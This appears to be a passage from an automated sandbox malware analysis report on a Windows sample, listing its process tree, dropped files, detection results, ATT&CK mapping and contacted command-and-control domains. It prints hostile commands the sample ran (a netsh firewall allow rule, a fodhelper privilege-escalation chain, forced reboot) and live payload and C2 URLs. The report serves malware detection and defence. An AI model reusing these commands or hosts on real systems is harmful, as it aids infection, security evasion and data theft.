exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeHxTsr.exehxtsr.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesgrmbroker.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exe1dyvcthqv1.exevmsrvc.exevmusrvc.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exesvchost.exeC:\WindowsPATHEXTNUL
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: +x@Y}main.isRunningInsideVMWare
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmpBinary or memory string: svchost.exesvchost.execonhost.exeUsoClient.exeusoclient.exeUsoClient.exeusoclient.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exevmx86
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Performs DNS TXT record lookupsShow sources
            Source: TrafficDNS traffic detected: queries for: trumops.com
            Source: TrafficDNS traffic detected: queries for: logs.trumops.com
            Source: TrafficDNS traffic detected: queries for: 3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com
            Source: TrafficDNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"Jump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /301-301Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yesJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5Jump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: svchost.exe, 00000006.00000002.550805662.000001F80A190000.00000002.00020000.sdmp, csrss.exe, 00000011.00000002.554582565.0000000003A60000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: svchost.exe, 00000006.00000002.550805662.000001F80A190000.00000002.00020000.sdmp, csrss.exe, 00000011.00000002.554582565.0000000003A60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: svchost.exe, 00000006.00000002.550805662.000001F80A190000.00000002.00020000.sdmp, csrss.exe, 00000011.00000002.554582565.0000000003A60000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: svchost.exe, 00000006.00000002.550805662.000001F80A190000.00000002.00020000.sdmp, csrss.exe, 00000011.00000002.554582565.0000000003A60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Uses netsh to modify the Windows network and firewall settingsShow sources
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            Changes security center settings (notifications, updates, antivirus, firewall)Show sources
            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
            Modifies the windows firewallShow sources
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
            Source: svchost.exe, 0000000B.00000002.549969533.0000024F52840000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: svchost.exe, 0000000B.00000002.550148875.0000024F52902000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

            Remote Access Functionality:

            barindex
            Yara detected Metasploit PayloadShow sources
            Source: Yara matchFile source: 33.2.csrss.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.1dyvctHqv1.exe.51a0e50.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.2.csrss.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.1dyvctHqv1.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 31.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 33.2.csrss.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.1dyvctHqv1.exe.51a0e50.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 39.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 52.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 39.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 31.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.1dyvctHqv1.exe.4fe0e50.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.1dyvctHqv1.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 31.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.csrss.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.3.1dyvctHqv1.exe.5a50000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.2.csrss.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.1dyvctHqv1.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 33.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.1dyvctHqv1.exe.5890000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 52.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 39.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 31.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.csrss.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 39.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 33.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 52.2.csrss.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 39.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 52.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.1dyvctHqv1.exe.4fe0e50.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 52.2.csrss.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.1dyvctHqv1.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 31.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 33.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000032.00000003.433190112.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.363027813.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000034.00000003.403303463.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000032.00000002.437840695.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.401387176.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000032.00000002.441852613.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000034.00000002.415283023.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.327502514.00000000051A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.294589443.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.410184897.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000034.00000002.423136850.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.549328827.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.415953009.0000000005700000.00000040.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation21DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools3Credential API Hooking1File and Directory Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsCommand and Scripting Interpreter2Scheduled Task/Job1Process Injection12Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery24Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder11Scheduled Task/Job1Obfuscated Files or Information11Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder11Software Packing211NTDSSecurity Software Discovery241Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol25SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading331Cached Domain CredentialsProcess Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 520213 Sample: 1dyvctHqv1 Startdate: 11/11/2021 Architecture: WINDOWS Score: 100 107 Antivirus detection for URL or domain 2->107 109 Antivirus detection for dropped file 2->109 111 Multi AV Scanner detection for dropped file 2->111 113 10 other signatures 2->113 9 1dyvctHqv1.exe 16 2->9         started        12 svchost.exe 2->12         started        14 svchost.exe 2->14         started        16 12 other processes 2->16 process3 dnsIp4 119 Detected unpacking (changes PE section rights) 9->119 121 Detected unpacking (overwrites its own PE header) 9->121 123 Modifies the windows firewall 9->123 125 Drops PE files with benign system names 9->125 19 1dyvctHqv1.exe 11 2 9->19         started        23 cmd.exe 12->23         started        127 Changes security center settings (notifications, updates, antivirus, firewall) 14->127 87 192.168.2.1 unknown unknown 16->87 25 WerFault.exe 16->25         started        27 csrss.exe 16->27         started        29 cmd.exe 16->29         started        signatures5 process6 file7 85 C:\Windows\rss\csrss.exe, PE32 19->85 dropped 115 Creates an autostart registry key pointing to binary in C:\Windows 19->115 31 csrss.exe 4 8 19->31         started        36 cmd.exe 1 19->36         started        38 WerFault.exe 19->38         started        40 fodhelper.exe 23->40         started        42 conhost.exe 23->42         started        44 fodhelper.exe 23->44         started        46 fodhelper.exe 23->46         started        signatures8 process9 dnsIp10 89 104.21.34.203, 443, 49752 CLOUDFLARENETUS United States 31->89 91 server3.trumops.com 172.67.139.144, 443, 49746, 49748 CLOUDFLARENETUS United States 31->91 93 6 other IPs or domains 31->93 77 C:\Windows\windefender.exe, PE32 31->77 dropped 79 C:\Users\user\AppData\Local\...\injector.exe, PE32+ 31->79 dropped 81 C:\Users\...81tQuerySystemInformationHook.dll, PE32+ 31->81 dropped 83 5 other files (none is malicious) 31->83 dropped 95 Multi AV Scanner detection for dropped file 31->95 97 Detected unpacking (changes PE section rights) 31->97 99 Detected unpacking (overwrites its own PE header) 31->99 105 3 other signatures 31->105 48 schtasks.exe 1 31->48         started        50 schtasks.exe 1 31->50         started        52 mountvol.exe 1 31->52         started        61 4 other processes 31->61 101 Uses netsh to modify the Windows network and firewall settings 36->101 54 netsh.exe 3 36->54         started        57 conhost.exe 36->57         started        103 Drops executables to the windows directory (C:\Windows) and starts them 40->103 59 csrss.exe 40->59         started        file11 signatures12 process13 signatures14 63 conhost.exe 48->63         started        65 conhost.exe 50->65         started        67 conhost.exe 52->67         started        117 Creates files in the system32 config directory 54->117 69 conhost.exe 61->69         started        71 conhost.exe 61->71         started        73 conhost.exe 61->73         started        75 conhost.exe 61->75         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            1dyvctHqv1.exe20%VirustotalBrowse
            1dyvctHqv1.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe100%AviraTR/Agent.twerk
            C:\Windows\windefender.exe100%AviraTR/Crypt.XPACK.eocey
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll100%AviraTR/Redcap.gsjan
            C:\Windows\rss\csrss.exe100%Joe Sandbox ML
            B:\EFI\Boot\old.efi (copy)0%ReversingLabs
            B:\EFI\Microsoft\Boot\fw.efi (copy)0%ReversingLabs
            C:\EFI\Boot\EfiGuardDxe.efi0%ReversingLabs
            C:\EFI\Boot\bootx64.efi0%ReversingLabs
            C:\EFI\Microsoft\Boot\bootmgfw.efi0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll46%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll59%ReversingLabsWin64.Trojan.Glupject
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe14%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe73%ReversingLabsWin64.Trojan.Glupteba
            C:\Windows\rss\csrss.exe25%ReversingLabs
            C:\Windows\windefender.exe29%MetadefenderBrowse
            C:\Windows\windefender.exe79%ReversingLabsWin32.Trojan.WinGoRanumBot

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            17.2.csrss.exe.16c3a000.17.unpack100%AviraTR/Patched.Ren.GenDownload File
            17.2.csrss.exe.16bba000.16.unpack100%AviraTR/Patched.Ren.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://retoti.comidentifier0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:0%URL Reputationsafe
            https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125560%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic0%Avira URL Cloudsafe
            https://server3.trumops.comc=e3acbc4a527610e5&uuid=server3.trumops.com:443server3.trumops.com:443tcp0%Avira URL Cloudsafe
            http://gohnot.com/546468561c5f48a95f3eb178d8283c2ec0%Avira URL Cloudsafe
            http://help.ya0%Avira URL Cloudsafe
            https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS0%Avira URL Cloudsafe
            http://gohnot.com/546468561c5f48a95f3eb178d8283c2e0%Avira URL Cloudsafe
            http://www.exabot.com/go/robot)Opera/9.800%URL Reputationsafe
            https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.com0%Avira URL Cloudsafe
            https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.comT0%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.com0%Avira URL Cloudsafe
            https://server3.trumops.com/api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f0%Avira URL Cloudsafe
            https://trumops.com/api/install-failureinvalid0%Avira URL Cloudsafe
            https://%s.xboxlive.com0%URL Reputationsafe
            http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
            http://www.bloglines.com)F0%Avira URL Cloudsafe
            https://dynamic.t0%URL Reputationsafe
            http://newscommer.com/app/app.exe100%URL Reputationmalware
            https://server3.trumops.com/api/poll0%Avira URL Cloudsafe
            https://blockchain.infoindex0%URL Reputationsafe
            https://server3.trumops.com/bots/post-ia-data?uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f0%Avira URL Cloudsafe
            http://www.avantbrowser.com)MOT-V9mm/00.620%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta0%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-10020%Avira URL Cloudsafe
            http://gais.cs.ccu.edu.tw/robot.php)Gulper0%Avira URL Cloudsafe
            http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exeH0%Avira URL Cloudsafe
            http://www.spidersoft.com)Wget/1.90%Avira URL Cloudsafe
            https://retoti.com0%Avira URL Cloudsafe
            https://trumops.comif-unmodified-sinceillegal0%Avira URL Cloudsafe
            http://devlog.gregarius.net/docs/ua)Links0%URL Reputationsafe
            https://server3.trumops.com0%Avira URL Cloudsafe
            https://runmodes.com/api/log100%Avira URL Cloudmalware
            http://grub.org)Mozilla/5.00%Avira URL Cloudsafe
            http://www.everyfeed.c0%Avira URL Cloudsafe
            http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exe0%Avira URL Cloudsafe
            https://trumops.com0%Avira URL Cloudsafe
            https://server3.trumops.com/api/pollserver3.trumops.com0%Avira URL Cloudsafe
            http://www.googlebot.com/bot.html)Links0%URL Reputationsafe
            https://runmodes.com/api/log3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com100%Avira URL Cloudmalware
            https://server3.trumops.com/api/poll620%Avira URL Cloudsafe
            https://server3.trumops.com3server3.trumops.com:443server3.trumops.com:443ontcpserver3.trumops.com0%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDDelegateExecuteC:0%Avira URL Cloudsafe
            http://misc.yahoo.com.cn/he0%Avira URL Cloudsafe
            http://crl.g0%URL Reputationsafe
            https://sitescore.aiValue0%Avira URL Cloudsafe
            https://%s.dnet.xboxlive.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            runmodes.com
            172.67.207.136
            truefalse
              high
              gohnot.com
              172.67.196.11
              truefalse
                high
                server3.trumops.com
                172.67.139.144
                truefalse
                  high
                  trumops.com
                  unknown
                  unknownfalse
                    high
                    3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com
                    unknown
                    unknownfalse
                      high
                      logs.trumops.com
                      unknown
                      unknownfalse
                        high
                        e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://server3.trumops.com/api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011ffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://server3.trumops.com/api/pollfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://server3.trumops.com/bots/post-ia-data?uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011ffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://runmodes.com/api/logtrue
                          • Avira URL Cloud: malware
                          unknown
                          http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exefalse
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://retoti.comidentifiercsrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
